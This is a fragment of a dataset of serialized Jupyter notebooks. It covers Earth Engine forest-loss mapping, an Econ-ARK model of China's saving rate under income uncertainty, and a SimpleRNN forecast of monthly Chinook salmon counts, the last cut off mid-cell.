'max': 1800\n})\nMap.addLayer(imageLoss_vis, {\n 'gamma': 0.6\n}, '2019 loss alert pixels in True colours')\n\n# It is still hard to see the loss area. You can circle them in red\n# Scale the results in nominal value based on to the dataset's projection to display on the map\n# Reprojecting with a specified scale ensures that pixel area does not change with zoom\nbuffered = ASIAalert.focal_max(50, 'circle', 'meters', 1)\nbufferOnly = ASIAalert.add(buffered).eq(1)\nprj = ASIAalert.projection()\nscale = prj.nominalScale()\nbufferScaled = bufferOnly.selfMask().reproject(prj.atScale(scale))\nMap.addLayer(bufferScaled, {\n 'palette': 'red'\n}, 'highlight the loss alert pixels')\n\n# Create a grey background for mosaic\nnoAlert = imageDec.multiply(ASIAalert.eq(0))\ngrey = noAlert.multiply(bufferScaled.unmask().eq(0))\n\n# Export the image\nimageMosaic = ee.ImageCollection([\n imageLoss_vis.visualize(**{\n 'gamma': 0.6\n }),\n bufferScaled.visualize(**{\n 'palette': 'red'\n }),\n grey.selfMask().visualize(**{\n 'bands': ['B3', 'B3', 'B3'],\n 'min': 0,\n 'max': 1800\n })\n]).mosaic()\n\n#Map.addLayer(imageMosaic, {}, 'export')\n\n# Export.image.toDrive({\n# 'image': imageMosaic,\n# description: 'Alert',\n# 'region': geometry,\n# crs: 'EPSG:3857',\n# 'scale': 10\n# })\n",
"ee.ImageCollection({\n \"type\": \"Invocation\",\n \"arguments\": {\n \"id\": \"projects/glad/alert/UpdResult\"\n },\n \"functionName\": \"ImageCollection.load\"\n})\n"
]
],
[
[
"## Display Earth Engine data layers ",
"_____no_output_____"
]
],
[
[
"Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)\nMap",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2bc88e8c522322f823f1fd9bf23c026ec28a08 | 25,979 | ipynb | Jupyter Notebook | notebooks/.ipynb_checkpoints/Chinese-Growth-checkpoint.ipynb | iworld1991/DemARK_course | 72b96b220fb8e1d732bad4915b4bd490f389f22a | [
"Apache-2.0"
] | null | null | null | notebooks/.ipynb_checkpoints/Chinese-Growth-checkpoint.ipynb | iworld1991/DemARK_course | 72b96b220fb8e1d732bad4915b4bd490f389f22a | [
"Apache-2.0"
] | null | null | null | notebooks/.ipynb_checkpoints/Chinese-Growth-checkpoint.ipynb | iworld1991/DemARK_course | 72b96b220fb8e1d732bad4915b4bd490f389f22a | [
"Apache-2.0"
] | null | null | null | 49.67304 | 571 | 0.644174 | [
[
[
"# Initial imports and notebook setup, click arrow to show\n%matplotlib inline\n# The first step is to be able to bring things in from different directories\nimport sys \nimport os\nsys.path.insert(0, os.path.abspath('../lib'))\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom copy import deepcopy\nfrom util import log_progress\nimport HARK # Prevents import error from Demos repo",
"_____no_output_____"
]
],
[
[
"# Do Precautionary Motives Explain China's High Saving Rate?\n\nThe notebook [Nondurables-During-Great-Recession](http://econ-ark.org/notebooks/) shows that the collapse in consumer spending in the U.S. during the Great Recession could easily have been caused by a moderate and plausible increase in the degree of uncertainty.\n\nBut that exercise might make you worry that invoking difficult-to-measure \"uncertainty\" can explain anything (e.g. \"the stock market fell today because the risk aversion of the representative agent increased\").\n\nThe next exercise is designed to show that there are limits to the phenomena that can be explained by invoking plausible changes in uncertainty.\n\nThe specific question is whether a high degree of uncertainty can explain China's very high saving rate (approximately 25 percent), as some papers have proposed. Specifically, we ask \"what beliefs about uncertainty would Chinese consumers need to hold in order to generate a saving rate of 25 percent, given the rapid pace of Chinese growth?\"\n\n### The Thought Experiment\n\nIn more detail, our consumers will initially live in a stationary, low-growth environment (intended to approximate China before 1978). Then, unexpectedly, income growth will surge at the same time that income uncertainty increases (intended to approximate the effect of economic reforms in China since 1978.) Consumers believe the high-growth, high-uncertainty state is highly persistent, but that ultimately growth will slow to a \"normal\" pace matching that of other advanced countries.\n",
"_____no_output_____"
],
[
"### The Baseline Model\n\nWe want the model to have these elements:\n0. \"Standard\" infinite horizon consumption/savings model, with mortality and permanent and temporary shocks to income\n0. The capacity to provide a reasonable match to the distribution of wealth inequality in advanced economies\n0. Ex-ante heterogeneity in consumers' discount factors (to capture wealth inequality)\n\nAll of these are features of the model in the paper [\"The Distribution of Wealth and the Marginal Propensity to Consume\" by Carroll, Slacalek, Tokuoka, and White (2017)](http://econ.jhu.edu/people/ccarroll/papers/cstwMPC), for which all of the computational results were produced using the HARK toolkit. The results for that paper are available in the $\\texttt{cstwMPC}$ directory.\n\n### But With A Different ConsumerType\n\nOne feature that was not present in that model is important here: \n- A Markov state that represents the state of the Chinese economy (to be detailed later)\n\nHARK's $\\texttt{MarkovConsumerType}$ is the right tool for this experiment. So we need to prepare the parameters to create that ConsumerType, and then create it.",
"_____no_output_____"
]
],
[
[
"# Initialize the cstwMPC parameters\ninit_China_parameters = {\n \"CRRA\":1.0, # Coefficient of relative risk aversion \n \"Rfree\":1.01/(1.0 - 1.0/160.0), # Survival probability,\n \"PermGroFac\":[1.000**0.25], # Permanent income growth factor (no perm growth),\n \"PermGroFacAgg\":1.0,\n \"BoroCnstArt\":0.0,\n \"CubicBool\":False,\n \"vFuncBool\":False,\n \"PermShkStd\":[(0.01*4/11)**0.5], # Standard deviation of permanent shocks to income\n \"PermShkCount\":5, # Number of points in permanent income shock grid\n \"TranShkStd\":[(0.01*4)**0.5], # Standard deviation of transitory shocks to income,\n \"TranShkCount\":5, # Number of points in transitory income shock grid\n \"UnempPrb\":0.07, # Probability of unemployment while working\n \"IncUnemp\":0.15, # Unemployment benefit replacement rate\n \"UnempPrbRet\":None,\n \"IncUnempRet\":None,\n \"aXtraMin\":0.00001, # Minimum end-of-period assets in grid\n \"aXtraMax\":20, # Maximum end-of-period assets in grid\n \"aXtraCount\":20, # Number of points in assets grid,\n \"aXtraExtra\":[None],\n \"aXtraNestFac\":3, # Number of times to 'exponentially nest' when constructing assets grid\n \"LivPrb\":[1.0 - 1.0/160.0], # Survival probability\n \"DiscFac\":0.97, # Default intertemporal discount factor, # dummy value, will be overwritten\n \"cycles\":0,\n \"T_cycle\":1,\n \"T_retire\":0,\n 'T_sim':1200, # Number of periods to simulate (idiosyncratic shocks model, perpetual youth)\n 'T_age': 400,\n 'IndL': 10.0/9.0, # Labor supply per individual (constant),\n 'aNrmInitMean':np.log(0.00001),\n 'aNrmInitStd':0.0,\n 'pLvlInitMean':0.0,\n 'pLvlInitStd':0.0,\n 'AgentCount':0, # will be overwritten by parameter distributor\n}",
"_____no_output_____"
]
],
[
[
"### Set Up the Growth Process\n\nFor a Markov model, we need a Markov transition array. Here, we create that array.\nRemember, for this simple example, we just have a low-growth state, and a high-growth state",
"_____no_output_____"
]
],
[
[
"StateCount = 2 #number of Markov states\nProbGrowthEnds = (1./160.) #probability agents assign to the high-growth state ending\nMrkvArray = np.array([[1.,0.],[ProbGrowthEnds,1.-ProbGrowthEnds]]) #Markov array\ninit_China_parameters['MrkvArray'] = [MrkvArray] #assign the Markov array as a parameter",
"_____no_output_____"
]
],
[
[
"One other parameter needs to change: the number of agents in simulation. We want to increase this, because later on when we vastly increase the variance of the permanent income shock, things get wonky. (We need to change this value here, before we have used the parameters to initialize the $\\texttt{MarkovConsumerType}$, because this parameter is used during initialization.)\n\nOther parameters that are not used during initialization can also be assigned here, by changing the appropriate value in the $\\texttt{init_China_parameters_dictionary}$; however, they can also be changed later, by altering the appropriate attribute of the initialized $\\texttt{MarkovConsumerType}$.",
"_____no_output_____"
]
],
[
[
"init_China_parameters['AgentCount'] = 10000",
"_____no_output_____"
]
],
[
[
"### Import and initialize the Agents\n\nHere, we bring in an agent making a consumption/savings decision every period, subject to transitory and permanent income shocks, AND a Markov shock",
"_____no_output_____"
]
],
[
[
"from HARK.ConsumptionSaving.ConsMarkovModel import MarkovConsumerType\nChinaExample = MarkovConsumerType(**init_China_parameters)",
"_____no_output_____"
]
],
[
[
"Currently, Markov states can differ in their interest factor, permanent growth factor, survival probability, and income distribution. Each of these needs to be specifically set.\n\nDo that here, except income distribution, which will be done later (because we want to examine the consequences of different income distributions).",
"_____no_output_____"
]
],
[
[
"ChinaExample.assignParameters(PermGroFac = [np.array([1.,1.06 ** (.25)])], #needs to be a list, with 0th element of shape of shape (StateCount,)\n Rfree = np.array(StateCount*[init_China_parameters['Rfree']]), #need to be an array, of shape (StateCount,)\n LivPrb = [np.array(StateCount*[init_China_parameters['LivPrb']][0])], #needs to be a list, with 0th element of shape of shape (StateCount,)\n cycles = 0)\n\nChinaExample.track_vars = ['aNrmNow','cNrmNow','pLvlNow'] # Names of variables to be tracked",
"_____no_output_____"
]
],
[
[
"Now, add in ex-ante heterogeneity in consumers' discount factors\n\nThe cstwMPC parameters do not define a discount factor, since there is ex-ante heterogeneity in the discount factor. To prepare to create this ex-ante heterogeneity, first create the desired number of consumer types:\n",
"_____no_output_____"
]
],
[
[
"num_consumer_types = 7 # declare the number of types we want\nChineseConsumerTypes = [] # initialize an empty list\n\nfor nn in log_progress(range(num_consumer_types), every=1):\n # Now create the types, and append them to the list ChineseConsumerTypes\n newType = deepcopy(ChinaExample) \n ChineseConsumerTypes.append(newType)",
"_____no_output_____"
]
],
[
[
"\nNow, generate the desired ex-ante heterogeneity, by giving the different consumer types each with their own discount factor.\n\nFirst, decide the discount factors to assign:",
"_____no_output_____"
]
],
[
[
"from HARK.utilities import approxUniform\n\nbottomDiscFac = 0.9800\ntopDiscFac = 0.9934 \nDiscFac_list = approxUniform(N=num_consumer_types,bot=bottomDiscFac,top=topDiscFac)[1]\n\n# Now, assign the discount factors we want to the ChineseConsumerTypes\nfor j in log_progress(range(num_consumer_types), every=1):\n ChineseConsumerTypes[j].DiscFac = DiscFac_list[j]",
"_____no_output_____"
]
],
[
[
"## Setting Up the Experiment\n\nThe experiment is performed by a function we will now write.\n\nRecall that all parameters have been assigned appropriately, except for the income process.\n\nThis is because we want to see how much uncertainty needs to accompany the high-growth state to generate the desired high savings rate.\n\nTherefore, among other things, this function will have to initialize and assign the appropriate income process.",
"_____no_output_____"
]
],
[
[
"# First create the income distribution in the low-growth state, which we will not change\nfrom HARK.ConsumptionSaving.ConsIndShockModel import constructLognormalIncomeProcessUnemployment\nimport HARK.ConsumptionSaving.ConsumerParameters as IncomeParams\n\nLowGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]\n\n# Remember the standard deviation of the permanent income shock in the low-growth state for later\nLowGrowth_PermShkStd = IncomeParams.PermShkStd\n\n\n\ndef calcNatlSavingRate(PrmShkVar_multiplier,RNG_seed = 0):\n \"\"\"\n This function actually performs the experiment we want.\n \n Remember this experiment is: get consumers into the steady-state associated with the low-growth\n regime. Then, give them an unanticipated shock that increases the income growth rate\n and permanent income uncertainty at the same time. What happens to the path for \n the national saving rate? Can an increase in permanent income uncertainty\n explain the high Chinese saving rate since economic reforms began?\n \n The inputs are:\n * PrmShkVar_multiplier, the number by which we want to multiply the variance\n of the permanent shock in the low-growth state to get the variance of the\n permanent shock in the high-growth state\n * RNG_seed, an integer to seed the random number generator for simulations. This useful\n because we are going to run this function for different values of PrmShkVar_multiplier,\n and we may not necessarily want the simulated agents in each run to experience\n the same (normalized) shocks.\n \"\"\"\n\n # First, make a deepcopy of the ChineseConsumerTypes (each with their own discount factor), \n # because we are going to alter them\n ChineseConsumerTypesNew = deepcopy(ChineseConsumerTypes)\n\n # Set the uncertainty in the high-growth state to the desired amount, keeping in mind\n # that PermShkStd is a list of length 1\n PrmShkStd_multiplier = PrmShkVar_multiplier ** .5\n IncomeParams.PermShkStd = [LowGrowth_PermShkStd[0] * PrmShkStd_multiplier] \n\n # Construct the appropriate income distributions\n HighGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]\n\n # To calculate the national saving rate, we need national income and national consumption\n # To get those, we are going to start national income and consumption at 0, and then\n # loop through each agent type and see how much they contribute to income and consumption.\n NatlIncome = 0.\n NatlCons = 0.\n\n for ChineseConsumerTypeNew in ChineseConsumerTypesNew:\n ### For each consumer type (i.e. each discount factor), calculate total income \n ### and consumption\n\n # First give each ConsumerType their own random number seed\n RNG_seed += 19\n ChineseConsumerTypeNew.seed = RNG_seed\n \n # Set the income distribution in each Markov state appropriately \n ChineseConsumerTypeNew.IncomeDstn = [[LowGrowthIncomeDstn,HighGrowthIncomeDstn]]\n\n # Solve the problem for this ChineseConsumerTypeNew\n ChineseConsumerTypeNew.solve()\n\n \"\"\"\n Now we are ready to simulate.\n \n This case will be a bit different than most, because agents' *perceptions* of the probability\n of changes in the Chinese economy will differ from the actual probability of changes. \n Specifically, agents think there is a 0% chance of moving out of the low-growth state, and \n that there is a (1./160) chance of moving out of the high-growth state. In reality, we \n want the Chinese economy to reach the low growth steady state, and then move into the \n high growth state with probability 1. Then we want it to persist in the high growth \n state for 40 years. \n \"\"\"\n \n ## Now, simulate 500 quarters to get to steady state, then 40 years of high growth\n ChineseConsumerTypeNew.T_sim = 660 \n \n # Ordinarily, the simulate method for a MarkovConsumerType randomly draws Markov states\n # according to the transition probabilities in MrkvArray *independently* for each simulated\n # agent. In this case, however, we want the discrete state to be *perfectly coordinated*\n # across agents-- it represents a macroeconomic state, not a microeconomic one! In fact,\n # we don't want a random history at all, but rather a specific, predetermined history: 125\n # years of low growth, followed by 40 years of high growth.\n \n # To do this, we're going to \"hack\" our consumer type a bit. First, we set the attribute\n # MrkvPrbsInit so that all of the initial Markov states are in the low growth state. Then\n # we initialize the simulation and run it for 500 quarters. However, as we do not\n # want the Markov state to change during this time, we change its MrkvArray to always be in\n # the low growth state with probability 1.\n \n ChineseConsumerTypeNew.MrkvPrbsInit = np.array([1.0,0.0]) # All consumers born in low growth state\n ChineseConsumerTypeNew.MrkvArray[0] = np.array([[1.0,0.0],[1.0,0.0]]) # Stay in low growth state\n ChineseConsumerTypeNew.initializeSim() # Clear the history and make all newborn agents\n ChineseConsumerTypeNew.simulate(500) # Simulate 500 quarders of data\n \n # Now we want the high growth state to occur for the next 160 periods. We change the initial\n # Markov probabilities so that any agents born during this time (to replace an agent who\n # died) is born in the high growth state. Moreover, we change the MrkvArray to *always* be\n # in the high growth state with probability 1. Then we simulate 160 more quarters.\n \n ChineseConsumerTypeNew.MrkvPrbsInit = np.array([0.0,1.0]) # All consumers born in low growth state\n ChineseConsumerTypeNew.MrkvArray[0] = np.array([[0.0,1.0],[0.0,1.0]]) # Stay in low growth state\n ChineseConsumerTypeNew.simulate(160) # Simulate 160 quarders of data\n \n # Now, get the aggregate income and consumption of this ConsumerType over time\n IncomeOfThisConsumerType = np.sum((ChineseConsumerTypeNew.aNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist*\n (ChineseConsumerTypeNew.Rfree[0] - 1.)) +\n ChineseConsumerTypeNew.pLvlNow_hist, axis=1)\n \n ConsOfThisConsumerType = np.sum(ChineseConsumerTypeNew.cNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist,axis=1)\n \n # Add the income and consumption of this ConsumerType to national income and consumption\n NatlIncome += IncomeOfThisConsumerType\n NatlCons += ConsOfThisConsumerType\n\n \n # After looping through all the ConsumerTypes, calculate and return the path of the national \n # saving rate\n NatlSavingRate = (NatlIncome - NatlCons)/NatlIncome\n\n return NatlSavingRate",
"_____no_output_____"
]
],
[
[
"Now we can use the function we just defined to calculate the path of the national saving rate following the economic reforms, for a given value of the increase to the variance of permanent income accompanying the reforms. We are going to graph this path for various values for this increase.\n\nRemember, we want to see if any plausible value for this increase can explain the high Chinese saving rate.",
"_____no_output_____"
]
],
[
[
"# Declare the number of periods before the reforms to plot in the graph\nquarters_before_reform_to_plot = 5\n\n# Declare the quarters we want to plot results for\nquarters_to_plot = np.arange(-quarters_before_reform_to_plot ,160,1)\n\n# Create a list to hold the paths of the national saving rate\nNatlSavingsRates = []\n\n# Create a list of floats to multiply the variance of the permanent shock to income by\nPermShkVarMultipliers = (1.,2.,4.,8.,11.)\n\n# Loop through the desired multipliers, then get the path of the national saving rate\n# following economic reforms, assuming that the variance of the permanent income shock\n# was multiplied by the given multiplier\nindex = 0\nfor PermShkVarMultiplier in log_progress(PermShkVarMultipliers, every=1):\n NatlSavingsRates.append(calcNatlSavingRate(PermShkVarMultiplier,RNG_seed = index)[-160 - quarters_before_reform_to_plot :])\n index +=1",
"_____no_output_____"
]
],
[
[
"We've calculated the path of the national saving rate as we wanted. All that's left is to graph the results!",
"_____no_output_____"
]
],
[
[
"plt.ylabel('Natl Savings Rate')\nplt.xlabel('Quarters Since Economic Reforms')\nplt.plot(quarters_to_plot,NatlSavingsRates[0],label=str(PermShkVarMultipliers[0]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[1],label=str(PermShkVarMultipliers[1]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[2],label=str(PermShkVarMultipliers[2]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[3],label=str(PermShkVarMultipliers[3]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[4],label=str(PermShkVarMultipliers[4]) + ' x variance')\nplt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\nncol=2, mode=\"expand\", borderaxespad=0.) #put the legend on top\nplt.show()",
"_____no_output_____"
]
],
[
[
"The figure shows that, if the rate of growth increases the way Chinese growth did, but is not accompanied by any change in the degree of uncertainty, the saving rate declines drastically, from an initial (calibrated) value of about 0.1 (ten percent) to close to zero. For this model to have any hope of predicting an increase in the saving rate, it is clear that the increase in uncertainty that accompanies the increase in growth will have to be substantial. \n\nThe red line shows that a mere doubling of uncertainty from its baseline value is not enough: The steady state saving rate is still below its slow-growth value.\n\nWhen we assume that the degree of uncertainty quadruples, the model does finally predict that the new steady-state saving rate will be higher than before, but not much higher, and not remotely approaching 25 percent.\n\nOnly when the degree of uncertainty increases by a factor of 8 is the model capable of producing a new equilbrium saving rate in the ballpark of the Chinese value. \n\nBut this is getting close to a point where the model starts to break down (for both numerical and conceptual reasons), as shown by the erratic path of the saving rate when we multiply the initial variance by 11. \n\nWe do not have historical data on the magnitude of permanent income shocks in China in the pre-1978 period; it seems implausible that the degree of uncertainty could have increased by such a large amount, but in the absence of good data it is hard to know for sure. \n\nWhat the experiment does demonstrate, though, is that it is _not_ the case that \"it is easy to explain anything by invoking some plausible but unmeasurable change in uncertainty.\" Substantial differences in the degree of permanent (or highly persistent) income uncertainty across countries, across periods, and across people have been measured in many papers, and those differences could in principle be compared to differences in saving rates to get a firmer fix on the quantitative importance of the \"precautionary saving\" explanation in the Chinese context.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2bcec1785b2bf9666b6438a661dfd4b152eea2 | 218,167 | ipynb | Jupyter Notebook | .ipynb_checkpoints/monthly_simple_rnn-checkpoint.ipynb | Abdul-Omira/SalmonNet | 21479d8fb6b7972504395c637926592ba5f148da | [
"MIT"
] | null | null | null | .ipynb_checkpoints/monthly_simple_rnn-checkpoint.ipynb | Abdul-Omira/SalmonNet | 21479d8fb6b7972504395c637926592ba5f148da | [
"MIT"
] | 3 | 2021-06-02T21:21:25.000Z | 2021-06-03T23:51:09.000Z | .ipynb_checkpoints/monthly_simple_rnn-checkpoint.ipynb | Abdul-Omira/SalmonNet | 21479d8fb6b7972504395c637926592ba5f148da | [
"MIT"
] | 1 | 2021-05-20T20:18:47.000Z | 2021-05-20T20:18:47.000Z | 77.009178 | 60,720 | 0.616294 | [
[
[
"<h1> Simple Single Layer RNN with Monthly dataset</h1>",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np \nimport math\nimport pandas as pd \nimport seaborn as sns\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom keras.optimizers import SGD\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout, GRU, SimpleRNN\n#\"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv\"\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nplt.style.use('fivethirtyeight')",
"_____no_output_____"
],
[
"# salmon_data = pd.read_csv(r\"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv\")\n# salmon_data.head()\n# salmon_copy = salmon_data # Create a copy for us to work with \ndef load_data(pathname):\n salmon_data = pd.read_csv(pathname)\n salmon_data.head()\n salmon_copy = salmon_data # Create a copy for us to work with \n salmon_copy.rename(columns = {\"mo\": \"month\", \"da\" : \"day\", \"fc\" : \"king\"}, \n inplace = True)\n salmon_copy['date']=pd.to_datetime(salmon_copy[['year','month','day']])\n# print(salmon_copy)\n king_data = salmon_copy.filter([\"date\",\"king\"], axis=1)\n# print(king_data)\n king_greater = king_data['date'].apply(pd.Timestamp) >= pd.Timestamp('01/01/1939')\n greater_than = king_data[king_greater]\n king_all = greater_than[greater_than['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2020')]\n king_all_copy = king_all\n king_all_copy = king_all_copy.reset_index()\n king_all_copy = king_all_copy.drop('index', axis=1)\n return king_all_copy, king_data",
"_____no_output_____"
],
[
" chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/passBonCS.csv'\n ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv'\n abdul_path = '/Users/abdul/Downloads/SalmonNet/data.csv'\n king_all_copy, king_data= load_data(chris_path)\n print(king_all_copy)",
" date king\n0 1939-01-01 0\n1 1939-01-02 0\n2 1939-01-03 0\n3 1939-01-04 1\n4 1939-01-05 0\n... ... ...\n24364 2020-12-25 0\n24365 2020-12-26 0\n24366 2020-12-27 0\n24367 2020-12-28 0\n24368 2020-12-29 0\n\n[24369 rows x 2 columns]\n"
],
[
"data_copy = king_all_copy\ndata_copy['date']\ndata_copy.set_index('date', inplace=True)\ndata_copy.index = pd.to_datetime(data_copy.index)\ndata_copy = data_copy.resample('1M').sum()\ndata_copy",
"_____no_output_____"
],
[
"print(data_copy)\ndata_copy.shape",
" king\ndate \n1939-01-31 6\n1939-02-28 12\n1939-03-31 121\n1939-04-30 51410\n1939-05-31 25159\n... ...\n2020-08-31 105269\n2020-09-30 254930\n2020-10-31 30917\n2020-11-30 843\n2020-12-31 9\n\n[984 rows x 1 columns]\n"
],
[
"data_copy.reset_index(inplace=True)\ndata_copy = data_copy.rename(columns = {'index':'date'})",
"_____no_output_____"
],
[
"print(data_copy)",
" date king\n0 1939-01-31 6\n1 1939-02-28 12\n2 1939-03-31 121\n3 1939-04-30 51410\n4 1939-05-31 25159\n.. ... ...\n979 2020-08-31 105269\n980 2020-09-30 254930\n981 2020-10-31 30917\n982 2020-11-30 843\n983 2020-12-31 9\n\n[984 rows x 2 columns]\n"
],
[
"def create_train_test(king_all):\n king_training_parse = king_all['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2015')\n king_training = king_all[king_training_parse]\n king_training = king_training.reset_index()\n king_training = king_training.drop('index', axis=1)\n \n king_test_parse = king_all['date'].apply(pd.Timestamp) > pd.Timestamp('12/31/2015')\n king_test = king_all[king_test_parse]\n king_test = king_test.reset_index()\n king_test = king_test.drop('index', axis=1)\n print(king_test.shape)\n \n # Normalizing Data\n king_training[king_training[\"king\"] < 0] = 0 \n# print('max val king_train:')\n print(max(king_training['king']))\n king_test[king_test[\"king\"] < 0] = 0\n# print('max val king_test:')\n print(max(king_test['king']))\n king_train_pre = king_training[\"king\"].to_frame()\n# print(king_train_norm)\n king_test_pre = king_test[\"king\"].to_frame()\n scaler = MinMaxScaler(feature_range=(0, 1))\n king_train_norm = scaler.fit_transform(king_train_pre)\n king_test_norm = scaler.fit_transform(king_test_pre)\n print('king_test_norm')\n print(king_test_norm.shape)\n print('king_train_norm')\n print(king_train_norm.shape)\n #king_train_norm = (king_training[\"king\"] - np.min(king_training[\"king\"])) / (np.max(king_training[\"king\"]) - np.min(king_training[\"king\"]))\n #print(type(king_train_norm))\n #king_train_norm = king_train_norm.to_frame()\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n y_test_not_norm = []\n y_train_not_norm = []\n \n # Todo: Experiment with input size of input (ex. 30 days)\n \n for i in range(6,924): # 30\n x_train.append(king_train_norm[i-6:i])\n y_train.append(king_train_norm[i])\n for i in range(6, 60):\n x_test.append(king_test_norm[i-6:i])\n y_test.append(king_test_norm[i])\n \n # make y_test_not_norm\n for i in range(6, 60):\n y_test_not_norm.append(king_test['king'][i])\n for i in range(6,924): # 30\n y_train_not_norm.append(king_training['king'][i])\n \n return x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm",
"_____no_output_____"
],
[
"x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm = create_train_test(data_copy)\nx_train = np.array(x_train)\nx_test = np.array(x_test)\nx_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1)).astype(np.float32)\nx_test = np.reshape(x_test, (x_test.shape[0],x_test.shape[1],1))\ny_train = np.array(y_train)\ny_test = np.array(y_test)\ny_test_not_norm = np.array(y_test_not_norm)\nprint(y_test.shape)\ny_test_not_norm = y_test_not_norm.reshape((y_test_not_norm.shape[0], 1))\nprint(y_test_not_norm.shape)\ny_train_not_norm = np.array(y_train_not_norm)\ny_train_not_norm = y_train_not_norm.reshape((y_train_not_norm.shape[0], 1))\nprint(y_train_not_norm.shape)\nprint(y_train.shape)",
"(60, 2)\n717915\n294611\nking_test_norm\n(60, 1)\nking_train_norm\n(924, 1)\n(54, 1)\n(54, 1)\n(918, 1)\n(918, 1)\n"
],
[
"def plot_predictions(test,predicted):\n plt.plot(test, color='red',label='Real Chinook Count')\n plt.plot(predicted, color='blue',label='Predicted Chinook Count')\n plt.title('Chinook Population Prediction')\n plt.xlabel('Time')\n plt.ylabel('Chinook Count')\n plt.legend()\n plt.show()\n \ndef plot_loss(history):\n plt.plot(history.history['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.show()\n\ndef return_rmse(test, predicted):\n rmse = math.sqrt(mean_squared_error(test, predicted))\n print(\"The root mean squared error is {}.\".format(rmse))\n \ndef month_to_year(month_preds):\n month_preds = month_preds[5:]\n print(len(month_preds))\n year_preds = []\n for i in range(12, len(month_preds), 12): \n salmon_count = np.sum(month_preds[i - 12:i])\n year_preds.append(salmon_count)\n year_preds = pd.DataFrame(year_preds, columns = [\"Count\"])\n return year_preds",
"_____no_output_____"
],
[
"def create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler):\n '''\n create single layer rnn model trained on x_train and y_train\n and make predictions on the x_test data\n '''\n # create a model\n model = Sequential()\n model.add(SimpleRNN(32, return_sequences=True))\n model.add(SimpleRNN(32, return_sequences=True))\n model.add(SimpleRNN(32, return_sequences=True))\n model.add(SimpleRNN(1))\n model.add(Dense(1))\n\n model.compile(optimizer='adam', loss='mean_squared_error')\n\n # fit the RNN model\n history = model.fit(x_train, y_train, epochs=1000, batch_size=64)\n\n print(\"predicting\")\n # Finalizing predictions\n RNN_train_preds = model.predict(x_train)\n RNN_test_preds = model.predict(x_test)\n \n #Descale\n RNN_train_preds = scaler.inverse_transform(RNN_train_preds)\n y_train = scaler.inverse_transform(y_train)\n RNN_test_preds = scaler.inverse_transform(RNN_test_preds)\n RNN_test_preds = RNN_test_preds.astype(np.int64)\n y_test = scaler.inverse_transform(y_test)\n# RNN_salmon_count = (RNN_preds * (np.max(king_training[\"king\"]) - np.min(king_training[\"king\"])) + np.min(king_training[\"king\"])).astype(np.int64)\n\n# why are we normalizing the test and train set, then un-normalizing (maybe this can cause problems in the sense tht we are\n# not comparing our preds to the proper y values)\n return model, RNN_train_preds, RNN_test_preds, history, y_train, y_test",
"_____no_output_____"
],
[
"model, RNN_train_preds, RNN_test_preds, history_RNN, y_train, y_test = create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler)",
